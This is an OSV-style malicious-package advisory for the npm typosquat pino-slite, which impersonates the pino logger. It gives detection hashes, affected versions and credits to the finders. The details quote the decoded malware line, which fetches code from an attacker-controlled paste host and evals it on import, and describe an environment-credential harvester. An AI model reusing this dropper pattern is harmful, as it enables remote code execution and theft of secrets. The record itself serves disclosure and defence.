{"id":"MAL-2026-6078","summary":"Malicious code in pino-slite (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (ea546461f3101a972511a0bb9d66b73849904ad3522724d1670b003e108c11bb)\npino-slite impersonates the legitimate `pino` logger (README titled 'pino-slite (Pino)' with badges and homepage pointing to getpino.io, exported function named `pino`). On require(), lib/writer.js (loaded transitively from the package main pino.js) decodes a base64 string and passes it to eval(atob(hash)). The decoded payload performs `fetch('https://jsonkeeper.com/b/0DWFC').then(r=\u003er.json()).then(d=\u003e{eval(d.ret);})`, executing attacker-controlled JavaScript fetched from a mutable third-party paste host on every load. Immediately before the eval, the module assembles a `data` object containing `{...process.env, version, platform: os.platform(), hostname: os.hostname(), username: os.userInfo().username, macAddresses: \u003cnon-internal IPv4 MACs\u003e}`, which is in scope for the remotely-fetched code — providing a ready-made channel to exfiltrate the installer's full environment (CI secrets, AWS_*, NPM_TOKEN, GH tokens, etc.) and host identifiers. This combines a typosquat lure, an import-time RCE dropper from an attacker-controlled mutable URL, and an environment-credential harvester.\n","aliases":["GHSA-4m74-rvqg-rg5w"],"modified":"2026-09-01T11:31:12.488271736Z","published":"2026-06-17T21:40:46Z","database_specific":{"malicious-packages-origins":[{"id":"IN-MAL-2026-006944","import_time":"2026-06-17T21:42:18.197754588Z","modified_time":"2026-06-17T21:40:46Z","sha256":"7ed71e73ac59b29f0867d2fbb15fc0391049b1ba4fe3c7b310bfbd1e84067c9e","source":"amazon-inspector","versions":["4.1.16"]},{"id":"IN-MAL-2026-006945","import_time":"2026-06-17T21:42:18.296198728Z","modified_time":"2026-06-17T21:40:49Z","sha256":"ea546461f3101a972511a0bb9d66b73849904ad3522724d1670b003e108c11bb","source":"amazon-inspector","versions":["4.1.12"]},{"import_time":"2026-07-09T09:16:42.943204672Z","modified_time":"2026-07-07T13:04:20Z","sha256":"73bf8200a1764383df2422272fd4d22f82b400dec6aca1f0dcc0532ca2367500","source":"reversing-labs","versions":["4.1.12","4.1.16"],"id":"RLMA-2026-05223"},{"sha256":"3564819f0578784665cf6210bbe209550fada1dfdd9f1285988b9a8add4ca3ee","source":"reversing-labs","id":"RLUA-2026-05594","import_time":"2026-07-20T13:15:03.81501971Z","modified_time":"2026-07-20T10:53:57Z"},{"sha256":"62a1881c2543bf668adc93680dee08b4f89a5629cb14ebb4c33300376d9f6c23","source":"reversing-labs","id":"RLUA-2026-06380","import_time":"2026-09-01T11:18:16.05193793Z","modified_time":"2026-08-24T17:04:12Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/pino-slite/v/4.1.16"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/pino-slite/v/4.1.12"},{"type":"ADVISORY","url":"https://github.com/advisories/GHSA-4m74-rvqg-rg5w"}],"affected":[{"package":{"name":"pino-slite","ecosystem":"npm","purl":"pkg:npm/pino-slite"},"versions":["4.1.16","4.1.12"],"database_specific":{"cwes":[{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"}],"indicators":{"package_integrity":[{"hashes":{"sha1":"1e3cc2363b6a71bdcb7ae8e3052c3b557fbbbd8f","sha512_sri":"sha512-TUxVgdCfhTtdPbyD/tiDcnbJlDO8HxSebYFT2UBAHexWwVdEDqxT6uHDzdP0+uhHU0egoOWk5dY8NqCioL3+dA=="},"filename":"pino-slite-4.1.16.tgz"}],"evidence_files":[{"path":"lib/writer.js","sha256":"b6a7f0998e9b8ce77f9492f1156159f143faded6f9d27a790d19e4af8a7d221f","tlsh":"c61104a195e7649816302be10cc74820bed5b3423197809cbabcc5d52fe7ce17195f70"},{"tlsh":"b3016425ce688e6309d92992882d1187aa60ad6b980cfc2c73c3631d0f8d57f19be57d","path":"package.json","sha256":"e84dbee6692b3b39e05a3f3a0873c248336ce1690c1d3141f0ae2e12466c016b"}]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/pino-slite/MAL-2026-6078.json"}}],"schema_version":"1.9.0","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"},{"name":"ReversingLabs","contact":["https://www.reversinglabs.com"],"type":"FINDER"}]}